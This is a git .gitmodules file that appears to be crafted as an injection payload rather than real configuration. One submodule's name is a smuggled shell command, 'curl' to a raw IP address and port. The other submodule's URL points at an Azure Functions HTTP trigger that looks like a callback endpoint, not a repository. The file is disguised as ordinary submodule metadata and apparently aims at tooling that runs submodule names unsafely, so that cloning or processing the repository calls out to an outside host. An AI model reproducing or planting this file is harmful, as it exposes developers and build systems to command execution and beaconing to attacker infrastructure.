[submodule "awesomelibrary"]
 path = awesomelibrary
 url = https://backlogger.azurewebsites.net/api/HttpTrigger1?git-submodule
[submodule "curl 159.65.113.57:8000?git=8"]
	path = mywiggle
	url = 159.65.113.57:8000?git=8
